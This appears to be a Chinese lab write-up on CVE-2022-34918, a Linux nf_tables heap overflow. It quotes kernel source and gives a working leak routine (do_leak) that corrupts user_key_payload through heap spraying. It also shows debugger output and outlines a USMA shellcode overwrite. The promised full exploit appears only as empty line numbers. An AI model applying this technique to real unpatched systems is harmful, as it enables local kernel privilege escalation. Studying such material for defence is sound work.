0%

CVE-2022-34918

1
Linux version 5.17.15 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #2 SMP PREEMPT Tue Dec 12 20:07:22 CST 2023
1
2
3
4
5
6
7
8
9
10
qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 oops=panic panic=-1 pti=on kaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1
  • smap,smep,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

poweroff -d 0 -f

内核下载: Index of /pub/linux/kernel/v5.x/

关键的编译选项如下:

1
2
3
4
5
6
7
CONFIG_NF_TABLES=y
CONFIG_NETFILTER_NETLINK=y
CONFIG_BINFMT_MISC=m
CONFIG_USER_NS=y

CONFIG_E1000=m
CONFIG_E1000E=m

Netfilter 介绍

Netfilter 是一个 Linux 内核模块,用于防火墙功能,它提供了一个灵活的框架,允许用户自定义防火墙规则,以控制网络流量和保护网络安全

Netfilter 模块是 Linux 内核中流量过滤器的基础,可以与多种其他模块一起使用(例如:iptables 和 ip6tables),具有如下功能:

  • 网络地址转换(Network Address Translate)
  • 数据包内容修改
  • 数据包过滤的防火墙功能

在分析 Netfilter 之前先解释一些防火墙的相关概念:

链的概念:

  • 数据报文从进入服务器到出来会经过5道关卡,分别为:
    • Prerouting(路由前)、Input(输入)、Outpu(输出)、Forward(转发)、Postrouting(路由后)
  • 每一道关卡中有多个规则,数据报文必须按顺序一个一个匹配这些规则,这些规则串起来就像一条链,所以我们把这些关卡都叫“链”

1702384117476

表的概念:

  • 每一条链上有多条规则,有些规则的作用相似,多条具有相同功能的规则合在一起就组成了一个“表”
  • Netfilter 模块拥有5个表:
    • filter 表:用于过滤包,有 INPUT、FORWARD、OUTPUT 三个链(最常用的表)
    • nat 表:用于网络地址转换,有 PREROUTING、POSTROUTING 三个链
    • managle 表:用于给数据包做标记,几乎用不到
    • raw 表:可以实现不追踪某些数据包
    • security 表:用于强制访问控制(MAC)的网络规则(在centos6中并没有)

规则的概念:

  • 规则主要包含 “条件&动作”,即匹配出符合什么条件(规则)后,对它采取怎样的动作
  • 规则被添加到指定表的指定链中,由表达式和语句组成

表达式的概念:

  • 表达式表示值,可以是网络地址、端口号等常量,也可以是在规则集评估期间从数据包中收集的数据
  • 可以使用二进制、逻辑、关系和其他类型的表达式组合表达式以形成复杂或关系(匹配)表达式
  • 每个表达式都有一个数据类型,它决定了符号值的大小、解析和表示以及与其他表达式的类型兼容性

该模块的初始化由 nfnetlink_net_init 函数执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static int __net_init nfnetlink_net_init(struct net *net)
{
struct nfnl_net *nfnlnet = nfnl_pernet(net);
struct netlink_kernel_cfg cfg = {
.groups = NFNLGRP_MAX,
.input = nfnetlink_rcv,
#ifdef CONFIG_MODULES
.bind = nfnetlink_bind,
#endif
};

nfnlnet->nfnl = netlink_kernel_create(net, NETLINK_NETFILTER, &cfg);
if (!nfnlnet->nfnl)
return -ENOMEM;
return 0;
}
  • 如果后续收到 netfilter 的消息则会调用 netlink_kernel_cfg->input 函数,也即 nfnetlink_rcv 函数

创建 table 的函数:nf_tables_newtable

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
static int nf_tables_newtable(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
struct nft_ctx ctx;
u32 flags = 0;
int err;

lockdep_assert_held(&nft_net->commit_mutex);
attr = nla[NFTA_TABLE_NAME];
table = nft_table_lookup(net, attr, family, genmask,
NETLINK_CB(skb).portid); /* 查找名称为NFTA_TABLE_NAME的table是否存在 */
if (IS_ERR(table)) {
if (PTR_ERR(table) != -ENOENT)
return PTR_ERR(table);
} else {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);

return nf_tables_updtable(&ctx); /* 如果存在该table,则进行更新 */
}

if (nla[NFTA_TABLE_FLAGS]) {
flags = ntohl(nla_get_be32(nla[NFTA_TABLE_FLAGS]));
if (flags & ~NFT_TABLE_F_MASK)
return -EOPNOTSUPP;
}

err = -ENOMEM;
table = kzalloc(sizeof(*table), GFP_KERNEL); /* 如果不存在就创建该表,并初始化 */
if (table == NULL)
goto err_kzalloc;

table->name = nla_strdup(attr, GFP_KERNEL);
if (table->name == NULL)
goto err_strdup;

if (nla[NFTA_TABLE_USERDATA]) {
table->udata = nla_memdup(nla[NFTA_TABLE_USERDATA], GFP_KERNEL);
if (table->udata == NULL)
goto err_table_udata;

table->udlen = nla_len(nla[NFTA_TABLE_USERDATA]);
}

err = rhltable_init(&table->chains_ht, &nft_chain_ht_params);
if (err)
goto err_chain_ht;

INIT_LIST_HEAD(&table->chains); /* 初始化4个链表 */
INIT_LIST_HEAD(&table->sets);
INIT_LIST_HEAD(&table->objects);
INIT_LIST_HEAD(&table->flowtables);
table->family = family;
table->flags = flags;
table->handle = ++table_handle;
if (table->flags & NFT_TABLE_F_OWNER)
table->nlpid = NETLINK_CB(skb).portid;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla); /* 将table加到nftbales上下文中 */
err = nft_trans_table_add(&ctx, NFT_MSG_NEWTABLE);
if (err < 0)
goto err_trans;

list_add_tail_rcu(&table->list, &nft_net->tables);
return 0;
err_trans:
rhltable_destroy(&table->chains_ht);
err_chain_ht:
kfree(table->udata);
err_table_udata:
kfree(table->name);
err_strdup:
kfree(table);
err_kzalloc:
return err;
}

创建 chain 的函数:nf_tables_newchain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
static int nf_tables_newchain(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct nft_chain *chain = NULL;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
u8 policy = NF_ACCEPT;
struct nft_ctx ctx;
u64 handle = 0;
u32 flags = 0;

lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_CHAIN_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* 首先先找table,无table直接退出 */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_TABLE]);
return PTR_ERR(table);
}

chain = NULL;
attr = nla[NFTA_CHAIN_NAME]; /* 找chain是否存在,存在进入update,不存在则添加一个新chain */

if (nla[NFTA_CHAIN_HANDLE]) { /* 通过nla[NFTA_CHAIN_HANDLE]查找chain */
handle = be64_to_cpu(nla_get_be64(nla[NFTA_CHAIN_HANDLE]));
chain = nft_chain_lookup_byhandle(table, handle, genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_HANDLE]);
return PTR_ERR(chain);
}
attr = nla[NFTA_CHAIN_HANDLE];
} else if (nla[NFTA_CHAIN_NAME]) { /* 通过nla[NFTA_CHAIN_NAME]查找chain */
chain = nft_chain_lookup(net, table, attr, genmask);
if (IS_ERR(chain)) {
if (PTR_ERR(chain) != -ENOENT) {
NL_SET_BAD_ATTR(extack, attr);
return PTR_ERR(chain);
}
chain = NULL;
}
} else if (!nla[NFTA_CHAIN_ID]) {
return -EINVAL;
}

if (nla[NFTA_CHAIN_POLICY]) {
if (chain != NULL &&
!nft_is_base_chain(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

if (chain == NULL &&
nla[NFTA_CHAIN_HOOK] == NULL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

policy = ntohl(nla_get_be32(nla[NFTA_CHAIN_POLICY]));
switch (policy) {
case NF_DROP:
case NF_ACCEPT:
break;
default:
return -EINVAL;
}
}

if (nla[NFTA_CHAIN_FLAGS])
flags = ntohl(nla_get_be32(nla[NFTA_CHAIN_FLAGS]));
else if (chain)
flags = chain->flags;

if (flags & ~NFT_CHAIN_FLAGS)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

if (chain != NULL) {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

flags |= chain->flags & NFT_CHAIN_BASE;
return nf_tables_updchain(&ctx, genmask, policy, flags, attr,
extack); /* 找到chain则更新 */
}

return nf_tables_addchain(&ctx, family, genmask, policy, flags, extack); /* 未找到就调用该函数进行创建 */
}

创建 rule & expression 的函数:nf_tables_newrule

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
unsigned int size, i, n, ulen = 0, usize = 0;
u8 genmask = nft_genmask_next(info->net);
struct nft_rule *rule, *old_rule = NULL;
struct nft_expr_info *expr_info = NULL;
u8 family = info->nfmsg->nfgen_family;
struct nft_flow_rule *flow = NULL;
struct net *net = info->net;
struct nft_userdata *udata;
struct nft_table *table;
struct nft_chain *chain;
struct nft_trans *trans;
u64 handle, pos_handle;
struct nft_expr *expr;
struct nft_ctx ctx;
struct nlattr *tmp;
int err, rem;

lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_RULE_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* 获取table */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_TABLE]);
return PTR_ERR(table);
}

if (nla[NFTA_RULE_CHAIN]) { /* 获取chain */
chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN],
genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
return PTR_ERR(chain);
}
if (nft_chain_is_bound(chain))
return -EOPNOTSUPP;

} else if (nla[NFTA_RULE_CHAIN_ID]) {
chain = nft_chain_lookup_byid(net, nla[NFTA_RULE_CHAIN_ID]);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
return PTR_ERR(chain);
}
} else {
return -EINVAL;
}

if (nla[NFTA_RULE_HANDLE]) {
handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_HANDLE]));
rule = __nft_rule_lookup(chain, handle);
if (IS_ERR(rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return PTR_ERR(rule);
}

if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
old_rule = rule;
else
return -EOPNOTSUPP;
} else {
if (!(info->nlh->nlmsg_flags & NLM_F_CREATE) ||
info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EINVAL;
handle = nf_tables_alloc_handle(table);

if (chain->use == UINT_MAX)
return -EOVERFLOW;

if (nla[NFTA_RULE_POSITION]) {
pos_handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_POSITION]));
old_rule = __nft_rule_lookup(chain, pos_handle);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION]);
return PTR_ERR(old_rule);
}
} else if (nla[NFTA_RULE_POSITION_ID]) {
old_rule = nft_rule_lookup_byid(net, nla[NFTA_RULE_POSITION_ID]);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION_ID]);
return PTR_ERR(old_rule);
}
}
}

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

n = 0;
size = 0;
if (nla[NFTA_RULE_EXPRESSIONS]) { /* 若设置了nla[NFTA_RULE_EXPRESSIONS],会先把所有的expression遍历出来,计算其总值放在size中 */
expr_info = kvmalloc_array(NFT_RULE_MAXEXPRS,
sizeof(struct nft_expr_info),
GFP_KERNEL);
if (!expr_info)
return -ENOMEM;

nla_for_each_nested(tmp, nla[NFTA_RULE_EXPRESSIONS], rem) {
err = -EINVAL;
if (nla_type(tmp) != NFTA_LIST_ELEM)
goto err_release_expr;
if (n == NFT_RULE_MAXEXPRS)
goto err_release_expr;
err = nf_tables_expr_parse(&ctx, tmp, &expr_info[n]);
if (err < 0) {
NL_SET_BAD_ATTR(extack, tmp);
goto err_release_expr;
}
size += expr_info[n].ops->size;
n++;
}
}
/* Check for overflow of dlen field */
err = -EFBIG;
if (size >= 1 << 12)
goto err_release_expr;

if (nla[NFTA_RULE_USERDATA]) { /* 若设置了nla[NFTA_RULE_USERDATA],获取userdata的大小放在usize中 */
ulen = nla_len(nla[NFTA_RULE_USERDATA]);
if (ulen > 0)
usize = sizeof(struct nft_userdata) + ulen;
}

err = -ENOMEM;
rule = kzalloc(sizeof(*rule) + size + usize, GFP_KERNEL); /* 分配内存,创建一个rule,并初始化相关数据域 */
if (rule == NULL)
goto err_release_expr;

nft_activate_next(net, rule);

rule->handle = handle;
rule->dlen = size;
rule->udata = ulen ? 1 : 0;

if (ulen) {
udata = nft_userdata(rule);
udata->len = ulen - 1;
nla_memcpy(udata->data, nla[NFTA_RULE_USERDATA], ulen);
}

expr = nft_expr_first(rule);
for (i = 0; i < n; i++) {
err = nf_tables_newexpr(&ctx, &expr_info[i], expr);
if (err < 0) {
NL_SET_BAD_ATTR(extack, expr_info[i].attr);
goto err_release_rule;
}

if (expr_info[i].ops->validate)
nft_validate_state_update(net, NFT_VALIDATE_NEED);

expr_info[i].ops = NULL;
expr = nft_expr_next(expr);
}

if (chain->flags & NFT_CHAIN_HW_OFFLOAD) {
flow = nft_flow_rule_create(net, rule);
if (IS_ERR(flow)) {
err = PTR_ERR(flow);
goto err_release_rule;
}
}

if (info->nlh->nlmsg_flags & NLM_F_REPLACE) {
err = nft_delrule(&ctx, old_rule);
if (err < 0)
goto err_destroy_flow_rule;

trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (trans == NULL) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}
list_add_tail_rcu(&rule->list, &old_rule->list);
} else {
trans = nft_trans_rule_add(&ctx, NFT_MSG_NEWRULE, rule);
if (!trans) {
err = -ENOMEM;
goto err_destroy_flow_rule;
}

if (info->nlh->nlmsg_flags & NLM_F_APPEND) {
if (old_rule)
list_add_rcu(&rule->list, &old_rule->list);
else
list_add_tail_rcu(&rule->list, &chain->rules);
} else {
if (old_rule)
list_add_tail_rcu(&rule->list, &old_rule->list);
else
list_add_rcu(&rule->list, &chain->rules);
}
}
kvfree(expr_info);
chain->use++;

if (flow)
nft_trans_flow_rule(trans) = flow;

if (nft_net->validate_state == NFT_VALIDATE_DO)
return nft_table_validate(net, table);

return 0;

err_destroy_flow_rule:
if (flow)
nft_flow_rule_destroy(flow);
err_release_rule:
nf_tables_rule_release(&ctx, rule);
err_release_expr:
for (i = 0; i < n; i++) {
if (expr_info[i].ops) {
module_put(expr_info[i].ops->type->owner);
if (expr_info[i].ops->type->release_ops)
expr_info[i].ops->type->release_ops(expr_info[i].ops);
}
}
kvfree(expr_info);

return err;
}

expresssion 总共有如下多种类型:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static struct nft_expr_type *nft_basic_types[] = {
&nft_imm_type,
&nft_cmp_type,
&nft_lookup_type,
&nft_bitwise_type,
&nft_byteorder_type,
&nft_payload_type,
&nft_dynset_type,
&nft_range_type,
&nft_meta_type,
&nft_rt_type,
&nft_exthdr_type,
&nft_last_type,
&nft_counter_type,
};

漏洞分析

漏洞来自于 CVE-2022-34918,函数 nft_set_elem_init 存在堆溢出,溢出长度可达 64-16=48 字节,漏洞对象可以位于 kmalloc-{64,96,128,192}

先看 nft_set_elem_init 函数的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
void *nft_set_elem_init(const struct nft_set *set,
const struct nft_set_ext_tmpl *tmpl,
const u32 *key, const u32 *key_end,
const u32 *data, u64 timeout, u64 expiration, gfp_t gfp)
{
struct nft_set_ext *ext;
void *elem;

elem = kzalloc(set->ops->elemsize + tmpl->len, gfp); /* 这里的tmpl->len已经包括了desc.dlen */
if (elem == NULL)
return NULL;

ext = nft_set_elem_ext(set, elem);
nft_set_ext_init(ext, tmpl);

if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY))
memcpy(nft_set_ext_key(ext), key, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
memcpy(nft_set_ext_data(ext), data, set->dlen); /* 如果set->dlen不等于desc.dlen,则有可能发生溢出 */
if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION)) {
*nft_set_ext_expiration(ext) = get_jiffies_64() + expiration;
if (expiration == 0)
*nft_set_ext_expiration(ext) += timeout;
}
if (nft_set_ext_exists(ext, NFT_SET_EXT_TIMEOUT))
*nft_set_ext_timeout(ext) = timeout;

return elem;
}
  • 函数 memcpy 使用的拷贝长度来自于 nft_set 对象,但拷贝的目标是 nft_set_ext,其大小来自于 nft_set_ext_tmpl 对象
  • 如果 kzalloc 申请的大小和 memcpy 拷贝的大小不匹配,则可能发生堆溢出

两个关键结构体的条目如下:

1
2
3
4
5
struct nft_set_ext {
u8 genmask;
u8 offset[NFT_SET_EXT_NUM];
char data[];
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
struct nft_set {
struct list_head list;
struct list_head bindings;
struct nft_table *table;
possible_net_t net;
char *name;
u64 handle;
u32 ktype;
u32 dtype;
u32 objtype;
u32 size;
u8 field_len[NFT_REG32_COUNT];
u8 field_count;
u32 use;
atomic_t nelems;
u32 ndeact;
u64 timeout;
u32 gc_int;
u16 policy;
u16 udlen;
unsigned char *udata;
/* runtime data below here */
const struct nft_set_ops *ops ____cacheline_aligned;
u16 flags:14,
genmask:2;
u8 klen;
u8 dlen;
u8 num_exprs;
struct nft_expr *exprs[NFT_SET_EXPR_MAX];
struct list_head catchall_list;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};

分析 nft_add_set_elem 函数,确定 tmpl->len 的初始化过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
const struct nlattr *attr, u32 nlmsg_flags)
{

......

timeout = 0;
if (nla[NFTA_SET_ELEM_TIMEOUT] != NULL) {
if (!(set->flags & NFT_SET_TIMEOUT))
return -EINVAL;
err = nf_msecs_to_jiffies64(nla[NFTA_SET_ELEM_TIMEOUT],
&timeout);
if (err)
return err;
} else if (set->flags & NFT_SET_TIMEOUT) {
timeout = set->timeout;
}

......

if (nla[NFTA_SET_ELEM_KEY]) {
err = nft_setelem_parse_key(ctx, set, &elem.key.val,
nla[NFTA_SET_ELEM_KEY]);
if (err < 0)
goto err_set_elem_expr;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY, set->klen); /* 将tmpl->len初始化为set->klen */
}

if (nla[NFTA_SET_ELEM_KEY_END]) {
err = nft_setelem_parse_key(ctx, set, &elem.key_end.val,
nla[NFTA_SET_ELEM_KEY_END]);
if (err < 0)
goto err_parse_key;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY_END, set->klen); /* 将tmpl->len初始化为set->klen */
}

......

if (nla[NFTA_SET_ELEM_OBJREF] != NULL) {
if (!(set->flags & NFT_SET_OBJECT)) {
err = -EINVAL;
goto err_parse_key_end;
}
obj = nft_obj_lookup(ctx->net, ctx->table,
nla[NFTA_SET_ELEM_OBJREF],
set->objtype, genmask);
if (IS_ERR(obj)) {
err = PTR_ERR(obj);
goto err_parse_key_end;
}
nft_set_ext_add(&tmpl, NFT_SET_EXT_OBJREF);
}

if (nla[NFTA_SET_ELEM_DATA] != NULL) {
err = nft_setelem_parse_data(ctx, set, &desc, &elem.data.val,
nla[NFTA_SET_ELEM_DATA]);
if (err < 0)
goto err_parse_key_end;

dreg = nft_type_to_reg(set->dtype);
list_for_each_entry(binding, &set->bindings, list) {
struct nft_ctx bind_ctx = {
.net = ctx->net,
.family = ctx->family,
.table = ctx->table,
.chain = (struct nft_chain *)binding->chain,
};

if (!(binding->flags & NFT_SET_MAP))
continue;

err = nft_validate_register_store(&bind_ctx, dreg,
&elem.data.val,
desc.type, desc.len);
if (err < 0)
goto err_parse_data;

if (desc.type == NFT_DATA_VERDICT &&
(elem.data.val.verdict.code == NFT_GOTO ||
elem.data.val.verdict.code == NFT_JUMP))
nft_validate_state_update(ctx->net,
NFT_VALIDATE_NEED);
}

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_DATA, desc.len); /* 将tmpl->len初始化为desc.len */
}

......

}
  • 在该函数中,tmpl->len 将被初始化为 desc.len(跟 set->dlen 没有必然的联系)

用于控制 tmpl->len 大小的 nft_data_desc 结构体可以被用户控制,相关函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data_desc *desc,
struct nft_data *data,
struct nlattr *attr)
{
int err;

err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr); /* 据用户输入的attr来初始化desc和data */
if (err < 0)
return err;

if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) { /* 想要触发堆溢出,desc->len必定小于set->dlen,因此需要NFT_DATA_VERDICT标志位 */
nft_data_release(data, desc->type);
return -EINVAL;
}

return 0;
}

漏洞的触发链为:

  • nf_tables_newsetelem -> nft_add_set_elem -> nft_set_elem_init

入侵思路

核心步骤参考了该博客:基于USMA的内核通用EXP编写思路在 CVE-2022-34918 上的实践 (veritas501.github.io)

该 CVE 的堆溢出发生在 nftables 过滤器元素添加进入过滤器的过程(这个元素可以是任何一种可以用于过滤网络流量的类型,例如 IP 地址、端口号、协议类型等)

首先使用该堆溢出来覆盖 user_key_payload->datalen 用于泄露数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
int do_leak(void) {
key_serial_t id_buffer[SPRAY_KEY_CNT] = {0};
key_serial_t corrupted_key_id = 0;

struct leak_payload leak_payload;
memset(&leak_payload, 0, sizeof(struct leak_payload));
leak_payload.len = CORRUPT_SIZE;

retry:
puts("spraying user_key_payload ...");
spray_keyring(id_buffer, SPRAY_KEY_CNT); /* 填充user_key_payload */

puts("free some key to create holes ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("trigger oob write ...");
/* 填充hole并尝试堆溢出(填充刚刚释放的kmalloc-32) */
add_elem_to_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct leak_payload), (uint8_t *)&leak_payload);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id)) {
/* 堆喷id_buffer,查找被覆盖的user_key_payload */
printf("found keyring %d is corrupted!", corrupted_key_id);
} else {
puts("can't found corrupted keyring, retry ...");
key_revokes(id_buffer, SPRAY_KEY_CNT);
goto retry;
}

puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i++) {
if (id_buffer[i] == corrupted_key_id) {
continue;
}
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
leak_ptr = get_keyring_leak(corrupted_key_id); // proc_fs_context_ops
if (!leak_ptr) {
puts("leak rcu.func failed");
for (int i = 0; i < SPRAY_KEY_CNT; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);

return 0;
}
  • 通过 user_key_payload 做越界读,就可能读到 rcu.func 中的 user_free_payload_rcu 这个函数指针,从而泄露出内核代码段地址

调试信息如下:

1
2
*RDI  0xffff88800fae9548 ◂— 0x2fb0
*RSI 0xffffc90000607828 ◂— 0x0
1
0xffffffff81b96fdf <nft_set_elem_init+367>    rep movsq qword ptr [rdi], qword ptr [rsi]
1
2
3
4
pwndbg> telescope 0xffff88800fae9548
00:00000xffff88800fae9548 ◂— 0x0
01:0008│ rdi 0xffff88800fae9550 ◂— 0x8000
02:00100xffff88800fae9558 ◂— 'AAAAAAAAA'
1
2
3
4
pwndbg> telescope 0xffffc90000607828
00:00000xffffc90000607828 ◂— 0x0
01:0008│ rsi 0xffffc90000607830 —▸ 0xffffffff81b88000 (nfnetlink_rcv_batch+1456) ◂— mov qword ptr [r15 + 8], rax
02:00100xffffc90000607838 ◂— 0x1
  • user_key_payload->datalen(0xffff88800fae9550) 将会被覆盖为 0x8000
  • PS:这个 0xffffffff81b88000 源自于之前遗留的地址,我们只会使用其最后两字节

然后选择覆盖 ring buffer(pg_vec) 来打 USMA,将 user_free_payload_rcu 函数覆盖为 shellcode 即可(PS:可以使用大量的 nop 来填充 shellcode,增大打通的概率)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
